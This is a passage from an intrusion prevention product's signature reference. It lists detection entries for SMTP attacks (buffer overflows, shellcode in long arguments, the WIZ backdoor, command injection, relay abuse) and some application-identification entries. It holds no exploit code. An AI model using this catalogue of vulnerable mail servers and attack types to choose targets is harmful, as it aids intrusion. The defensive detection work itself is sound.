Tags: Unix, Any Hardware, Sendmail, CVE1999, Unix not specific, Sendmail not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-Pipe-Sendmail-Attack
Description:
Back to top

SMTP_MailEnable-SMTP-Authentication-Buffer-Overflow

About this situation: Detects buffer overflow exploits against MailEnable
Context: SMTP Client Command Stream
Severity: 10
Tags: Windows, x86, MailEnable, CVE2005, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-MailEnable-SMTP-Authentication-Buffer-Overflow
Description:
Back to top

SMTP_MailEnable-SMTP-Helo-Command-Denial-Of-Service

About this situation: Detects denial of service exploits against MailEnable
Context: SMTP Client Command Stream
Severity: 2
Tags: Windows, x86, MailEnable, CVE2006, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-71-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-MailEnable-SMTP-Helo-Command-Denial-Of-Service
Description:
Back to top

SMTP_MailEnable-SMTP-NTLM-Authentication-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in MailEnable MailEnable detected
Context: SMTP Client Command Stream
Severity: 7
Tags: Windows, Any Hardware, MailEnable, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: MailEnable-SMTP-NTLM-Authentication-Buffer-Overflow
Description:
Back to top

SMTP_McAfee-WebShield-SMTP-Bounce-Message-Format-String

About this situation: Detects format string exploits against McAfee WebShield SMTP
Context: SMTP Client Command Stream
Severity: 7
Tags: Windows, x86, McAfee WebShield SMTP, CVE2006, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: SMTP-McAfee-WebShield-SMTP-Bounce-Message-Format-String
Description:
Back to top

SMTP_MDaemon-SMTP-Command-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in MDaemon detected
Context: SMTP Client Command Stream
Severity: 7
Tags: Windows, Any Hardware, MDaemon, CVE2004, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-614-5211
Vulnerability: MDaemon-SMTP-Command-Buffer-Overflow
Description:
Back to top

SMTP_Mercury-Mail-Transport-System-SMTP-Auth-Cram-md5-Buffer-Overflow

About this situation: Buffer overflow exploit against Mercury Mail Transport System detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mercury Mail Transport System, CVE2007, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-119-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-Mercury-Mail-Transport-System-SMTP-Auth-Cram-md5-Buffer-Overflow
Description:
Back to top

SMTP_Microsoft-Exchange-Server-iCal-Denial-Of-Service

About this situation: Denial of Service against Microsoft Exchange Server detected
Context: SMTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2007-05, CVE2007, Windows not specific, Exchange Server not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-107-2032
Last changed: sgpkg-ips-670-5211
Vulnerability: Microsoft-Exchange-Server-ICalendar-DOS
Description:
Back to top

SMTP_Microsoft-Exchange-Server-Mime-Base64-Decoding-Code-Execution

About this situation: Buffer overflow exploit against Microsoft Exchange Server detected
Context: SMTP Client Stream
Severity: 7
Tags: Windows, x86, Exchange Server, MS2007-05, CVE2007, Windows not specific, Exchange Server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-107-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Exchange-Server-Mime-Base64-Decoding-Code-Execution
Description:
Back to top

SMTP_Microsoft-SMTP-Service-Data-Transfer-Command-Denial-Of-Service

About this situation: Microsoft SMTP service data transfer command denial of service
Context: SMTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2002, CVE2002, Windows not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Microsoft-SMTP-Service-Data-Transfer-Command-Denial-Of-Service
Description:
Back to top

SMTP_Microsoft-Word-RTF-Parsing-Stack-Exhaustion

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected
Context: SMTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, Windows not specific, Microsoft Word not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-998-5242
Vulnerability: Microsoft-Word-RTF-Parsing-Stack-Exhaustion
Description:
Back to top

SMTP_Multi-Command-Crash

About this situation: Suspicious command line, multiple command tokens
Context: SMTP Client Command Stream
Severity: 2
Tags: Windows, x86, 1st Up Mail Server, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-1st-Up-Multi-Command-Crash
Description:
Back to top

SMTP_Novell-Groupwise-Internet-Agent-RCPT-Command-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell Groupwise detected
Context: SMTP Client Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell GroupWise, CVE2009, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-288-4219
Vulnerability: Novell-Groupwise-Internet-Agent-RCPT-Command-Buffer-Overflow
Description:
Back to top

SMTP_Ntml-Null-Session-Authentication-Bypass

About this situation: Unauthenticated mail relay attempt via AUTH NTLM
Context: SMTP Client Command Stream
Severity: 7
Tags: Windows 2000 SP0, Windows 2000 SP1, Windows 2000 SP2, Any Hardware, Exchange Server 5.5, Exchange Server 5.0, MS2002, CVE2002, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: MS-SMTP-Service-Ntlm-Null-Session-Authentication-Bypass-MS02-011
Description:
Back to top

SMTP_Parameters-BDAT-Invalid

About this situation: Client sent SMTP BDAT command with invalid parameters
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The client sent an SMTP BDAT command with invalid parameters. The parameters may be misspelled (if the client is an interactive user instead of an SMTP client program), the command may use an extension that is not implemented in the SMTP module, or the client may be trying to do something suspicious. Risk analysis: Risk level is medium.
Back to top

SMTP_Parameters-BDAT-Invalid-Success

About this situation: SMTP BDAT command with invalid parameters not refused
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The client sent an SMTP BDAT command with invalid parameters. The parameters may be misspelled (if the client is an interactive user instead of an SMTP client program), the command may use an extension that is not implemented in the SMTP module, or the client may be trying to do something suspicious. This event was generated because the SMTP server did not send an error reply to the command. Risk analysis: Risk level is medium.
Back to top

SMTP_Pipeline-Overflow

About this situation: Excessive number of suspicious SMTP client commands or pipelining violations detected
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An excessive number of suspicious SMTP client commands or pipelining violations were detected. The SMTP inspection module ran out of memory during command pipeline inspection. The inspection module reverts to unsynchronized analysis for this session until the inspection synchronization can be re-established. Risk analysis: Risk level is fairly low.
Back to top

SMTP_Pipelining-Violation

About this situation: SMTP command pipelining violation detected
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: An SMTP command pipelining violation was detected. An SMTP client sent a command before waiting for a reply to the previous command. Either the pipelining extension [RFC 2920] does not allow this command to be pipelined, or the pipelining extension was not advertised in the server EHLO reply. Risk analysis: Risk level is fairly low. The SMTP client may be a script instead of real SMTP client software.
Back to top

SMTP_RCPT-To-BOF

About this situation: Possible buffer overflow, long RCPT To argument
Context: SMTP Client Command Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Generic SMTP server, CVE1999, CVE2000, CVE2001, CVE2002, CVE2003, CVE2006, CVE2008, Any Operating System not specific, Generic SMTP server not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-Msgcore-DoS
ITHouse-Mail-Server-RCPT-To-BOF
SMTP-Lotus-Notes-RCPT-To-Policy-BOF
SMTP-Novell-Groupwise-RCPT-To-BOF
SMTP-Netscape-Messaging-Server-RCPT-To-DoS
SMTP-FTGatePro-Mail-Server-RCPT-To-Buffer-Overflow
SMTP-Qk-SMTP-Server-RCPT-To-Command-Buffer-Overflow
SMTP_Citadel-SMTP-RCPT-To-Remote-Buffer-Overflow
Description:
Back to top

SMTP_RCPT-To-Decode

About this situation: Mail sent to decode detected, possible exploit
Context: SMTP Client Command Stream
Severity: 7
Tags: Unix, Any Hardware, Sendmail, CVE1999, Unix not specific, Sendmail not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-RCPT-To-Decode
Description:
Back to top

SMTP_RCPT-To-File

About this situation: An attempt to send mail into file detected
Context: SMTP Client Command Stream
Severity: 7
Tags: Unix, Any Hardware, Sendmail, CVE1999, Unix not specific, Sendmail not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-RCPT-To-File
Description:
Back to top

SMTP_RCPT-TO-Parameters-Invalid

About this situation: Client sent SMTP RCPT TO command with invalid parameters
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The client sent an SMTP RCPT TO command with invalid parameters. The parameters may be misspelled (if the client is an interactive user instead of an SMTP client program), the command may use an extension that is not implemented in the SMTP module, or the client may be trying to do something suspicious. Risk analysis: Risk level is medium.
Back to top

SMTP_RCPT-TO-Parameters-Invalid-Success

About this situation: SMTP RCPT TO command with invalid parameters not refused
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The client sent an SMTP RCPT TO command with invalid parameters. The parameters may be misspelled (if the client is an interactive user instead of an SMTP client program), the command may use an extension that is not implemented in the SMTP module, or the client may be trying to do something suspicious. This event was generated because the SMTP server did not send an error reply to the command. Risk analysis: Risk level is medium.
Back to top

SMTP_Relay

About this situation: Possible Unauthorized Relay detected
Context: SMTP Client Command Stream
Severity: 1
Tags: Any Operating System, Any Hardware, MS1999, CVE1999, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-720-5211
Vulnerability: SMTP-Mail-Relay
SMTP-Exchange-Mail-Relay
Description:
Back to top

SMTP_Reply-Extra

About this situation: SMTP server sent extra reply
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-336-4219
Description: An SMTP server sent an extra reply. There may be something wrong with the server, the server may have interpreted the client command in a different way than the SMTP inspection module, or the SMTP inspection module may have lost synchronization of the session. Risk analysis: Risk level is medium.
Back to top

SMTP_Reply-Inconsistent

About this situation: SMTP server sent inconsistent reply codes in multiline reply
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An SMTP server sent inconsistent reply codes in a multiline reply. This should not occur. There may be something wrong with the server. Risk analysis: Risk level is medium.
Back to top

SMTP_Reply-Sendmail-0xx-Unrequested

About this situation: Unrequested SMTP Sendmail 0xx reply was sent by the server
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An unrequested SMTP Sendmail 0xx reply was sent by the server. The SMTP server sent a reply code starting with a zero, when the client had not given a VERB command. A reply code starting with a zero is a non-standard Sendmail extension. Risk analysis: Risk level is fairly low.
Back to top

SMTP_Reply-Syntax

About this situation: SMTP server reply used incorrect syntax
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-240-3038
Description: An SMTP server reply used incorrect syntax. The SMTP server reply could not be understood. There may be something wrong with the server. Risk analysis: Risk level is medium.
Back to top

SMTP_Reply-Too-Long

About this situation: Reply too long
Context: SMTP without parameters
Severity: 2
Tags: Obsolete
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-240-3038
Description: The SMTP server reply is too long to conform with the SMTP specification [RFC 2821]. Risk analysis: Risk level is fairly low.
Back to top

SMTP_Routing-Source

About this situation: Source routing detected in SMTP command
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Source routing was detected in an SMTP command. The SMTP client gave a command that had source routing specified in the path argument. This is an obsolete feature of SMTP [RFC 2821] that should not be used. Modern SMTP servers should ignore source routing. Risk analysis: Risk level is fairly low.
Back to top

SMTP_Sendmail-Mime-BOF

About this situation: Sendmail Mime Buffer Overflow
Context: SMTP Client Stream
Severity: 7
Tags: BSD, Linux, x86, Sendmail, CVE1999, BSD not specific, Linux not specific, Sendmail not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-516-5211
Vulnerability: Sendmail-Mime-BOF
Description:
Back to top

SMTP_Sendmail-Nochar-BOF

About this situation: Sendmail buffer overflow attempt
Context: SMTP Client Command Stream
Severity: 7
Tags: Linux, Any Hardware, Sendmail 8, CVE2003, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: SMTP-Sendmail-Nochar-BOF
SMTP-Sendmail-Prescan-Buffer-Overflow
Description:
Back to top

SMTP_Sendmail-Timeout-Race-Condition

About this situation: Two SMTP message collect timeouts in the same connection, possible Sendmail exploit
Context: SMTP TCP Server Stream
Severity: 7
Tags: Unix, Any Hardware, Sendmail, CVE2006, Unix not specific, Sendmail not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-Sendmail-Timeout-Buffer-Overflow
Description:
Back to top

SMTP_Server-State-At-STARTTLS

About this situation: SMTP client sent data after STARTTLS command without waiting for server reply
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The SMTP client sent data after the STARTTLS command without waiting for the server reply first. Risk analysis: Risk level is fairly low.
Back to top

SMTP_Shared-Variables-For-Server-Stream-Context

About this situation: This fingerprint sets shared variables
Context: SMTP TCP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-1768-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

SMTP_Smail-3-Mail-From-BOF

About this situation: Attempt to exploit a buffer overflow in Smail
Context: SMTP Client Command Stream
Severity: 10
Tags: Unix, x86, Smail-3, CVE2005, Unix not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Smail-3-Mail-From-BOF
Description:
Back to top

SMTP_Smail-3-Mail-From-BOF2

About this situation: Smail Mail From Buffer Overflow
Context: SMTP Client Stream
Severity: 10
Tags: Unix, Any Hardware, Smail-3, CVE2005, Unix not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-363-4219
Vulnerability: Smail-3-Mail-From-BOF
Description:
Back to top

SMTP_Spam-Forward-Path-Success

About this situation: Non-trusted SMTP client sent e-mail to one or more recipients
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An SMTP client not defined as a trusted SMTP client tried to send e-mail to one or more recipients. The recipient(s) did not match the fingerprint of the allowed forward paths. This event was generated because the server did not give an error reply to the command. Risk analysis: Risk level is medium. If the SMTP server is not properly configured, it may be possible to use it in unauthorized mass e-mailing. Most relevant log fields: "SMTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

SMTP_SpamAssassin-Milter-Plugin-Shell-Command-Injection

About this situation: An attempt to exploit a command injection vulnerability in SpamAssassin Milter Plugin detected
Context: SMTP Client Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SpamAssassin Milter Plugin, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-295-4219
Last changed: sgpkg-ips-295-4219
Vulnerability: SpamAssassin-Milter-Plugin-Shell-Command-Injection
Description:
Back to top

SMTP_SS-OpenSMTPD-Mta_io-Out-Of-Bounds-Read-Command-Execution

About this situation: An attempt to exploit a vulnerability in OpenSMTPD detected
Context: SMTP TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSMTPD, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1250-5242
Vulnerability: OpenSMTPD-Mta_io-Out-Of-Bounds-Read-Command-Execution
Description:
Back to top

SMTP_SS-OpenSSL-TLS-Record-Tampering-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: SMTP TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-593-5211
Last changed: sgpkg-ips-593-5211
Vulnerability: OpenSSL-TLS-Record-Tampering-Denial-Of-Service
Description:
Back to top

SMTP_SS-SysGauge-SMTP-Validation-Buffer-Overflow

About this situation: A SysGauge SMTP Validation Buffer Overflow vulnerability
Context: SMTP TCP Server Stream
Severity: 7
Tags: Windows, Any Hardware, SysGauge, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1022-5242
Last changed: sgpkg-ips-1022-5242
Vulnerability: SysGauge-SMTP-Validation-Buffer-Overflow
Description:
Back to top

SMTP_StartTLS

About this situation: StartTLS usage detected on SMTP
Context: SMTP Client Command Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-479-5211
Last changed: sgpkg-ips-479-5211
Vulnerability: StartTLS-Usage
Description:
Back to top

SMTP_STARTTLS-Accepted

About this situation: SMTP server accepted STARTTLS command
Context: SMTP without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1536-5242
Last changed: sgpkg-ips-1536-5242
Description: The SMTP server accepted STARTTLS client command and the SMTP will start the TLS handshake next.
Back to top

SMTP_State-Wrong-At-EOF

About this situation: SMTP client or server in wrong state when connection was terminated
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The SMTP client or server was in a wrong state when the connection was terminated. Normally, an SMTP session ends after the client has sent QUIT command and the server has replied. This event was generated because the connection was closed before the proper command sequence was seen. Risk analysis: Risk level is fairly low.
Back to top

SMTP_Suspicious-Non-Standard-Helo-Domain-Name

About this situation: An non-standard SMTP HELO request detected
Context: SMTP Client Command Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Description:
Back to top

SMTP_Too-Many-Recipients

About this situation: Too many e-mail recipients were detected in an SMTP transaction.
Context: SMTP Recipients Count Limit
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-337-4219
Description: Too many e-mail recipients were detected in an SMTP transaction. The number of RCPT commands within one SMTP transaction exceeded the defined maximum number of recipients. The SMTP inspection module cannot store the complete envelope for possible later responses. Risk analysis: Risk level is low. Most relevant log fields: SRC and DST show the SMTP client and the server IP addresses.
Back to top

SMTP_Unknown-Command

About this situation: SMTP client used an unknown command
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-337-4219
Description: SMTP client used an unknown command. This may be a nonstandard extension of SMTP, or it may be a signal that the connection does not use SMTP at all.
Back to top

SMTP_Whitespace-Extra

About this situation: SMTP command contained extra whitespace character(s) after command name
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: An SMTP command contained extra whitespace character(s) after the command name. An SMTP client sent a command that does not follow the SMTP specification [RFC 2821]. Some widely used mail transfer agents systematically add an extra whitespace character after the command name. Risk analysis: Risk level is fairly low.
Back to top

SMTP_Whitespace-Extra-Success

About this situation: SMTP server did not refuse SMTP command with extra whitespace character(s) after command name
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: An SMTP server did not refuse an SMTP command with extra whitespace character(s) after the command name. An SMTP client sent a command that does not follow the SMTP specification [RFC 2821]. Some widely used mail transfer agents systematically add an extra whitespace character after the command name and most servers accept this. This event was generated because the server did not give an error reply to the command. Risk analysis: Risk level is fairly low. Most relevant log fields: "SMTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

SMTP_Win-ShellCode-1

About this situation: Windows shellcode seen within long HELO argument
Context: SMTP Client Command Stream
Severity: 10
Tags: Windows, x86, Mail-Max, CVE1999, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-Mailmax-BOF
Description:
Back to top

SMTP_Wiz-Detect

About this situation: WIZ SMTP backdoor command detected
Context: SMTP Client Command Stream
Severity: 7
Tags: Unix, Any Hardware, Sendmail, CVE1999, Unix not specific, Sendmail not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-Wiz-Backdoor
Description:
Back to top

SMTP_X86-ShellCode-1

About this situation: A shellcode has been detected within long ETRN argument
Context: SMTP Client Command Stream
Severity: 10
Tags: Unix, x86, Generic SMTP server, CVE2000, Unix not specific, Generic SMTP server not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: Netwin-Dmail-Etrn-BOF
Description:
Back to top

Smugmug

About this situation: SmugMug usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

Snap-2.0

About this situation: Application Snap-2.0 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KCS Datawright provide ERP solutions and ERP software for the manufacturing and chemical manufacturing industries.
Back to top

Snap-and-buy!

About this situation: Application Snap-and-buy! detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Snap and buy
Back to top

Snapbill

About this situation: SnapBill usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: SnapBill offers a comprehensive mix of invoicing, billing, client management and payment collection features. It has integrated service provisioning functionality so you may list and sell your own services through SnapBill while it fully automates your recurring and subscription billing.
Back to top

Snapchat

About this situation: Snapchat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-1714-5242
Description: Snapchat is a mobile application for sending photos and video messages for a selected audience. The sender can define the length of time that the messages can be viewed, after wich they are deleted.
Back to top

SnapComms

About this situation: Application SnapComms detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SnapComms - innovative internal communications tools; targeted desktop alerts and scrolling headlines, interactive screensaver messages and user generated newsletters.
Back to top

SnapCrowd

About this situation: Application SnapCrowd detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SnapCrowd is DAM (Digital Asset Management) and cloud storage platform.
Back to top

SnapEngage

About this situation: Application SnapEngage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SnapEngage is a company that creates customizable live chat software for sales and support.
Back to top

Snapfish

About this situation: Snapfish usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

Snapforce

About this situation: Application Snapforce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Snapforce offers enterprise CRM Software, Call Center Software and Contact Management Software solutions to small, medium, and large businesses.
Back to top

Snapfulfil

About this situation: Application Snapfulfil detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Snapfulfil delivers warehouse management solutions to customers in a range of industries including B2C and B2B retail, third-party logistics, manufacturing, food and beverage and electronics and electrical.
Back to top

Snapguide

About this situation: Application Snapguide detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Snapguide is iOS app and web service for those that want to create and share step-by-step how to guides.
Back to top

SnapLogic

About this situation: Application SnapLogic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SnapLogic is a cloud-based enterprise application integration company, connection architecture delivers smart data by integrating sources in the cloud and on the ground.
Back to top

SnapPages

About this situation: Application SnapPages detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SnapPages is a cloud-based platform to build, manage, and market your website.
Back to top

SnappyTV

About this situation: Application SnappyTV detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SnappyTV is a cloud-based, live video platform that makes TV and live web streams social, mobile and viral.
Back to top

SNMP

About this situation: Simple Network Management Protocol (SNMP) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1118-5242
Description: SNMP is a protocol used to manage nodes (servers, workstations, routers, switches and hubs etc.) on an IP network.
Back to top

SNMP Trap

About this situation: SNMP Trap received from third-party device
Context: Log Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-319-4219
Last changed: sgpkg-ips-1296-5242
Description:
Back to top

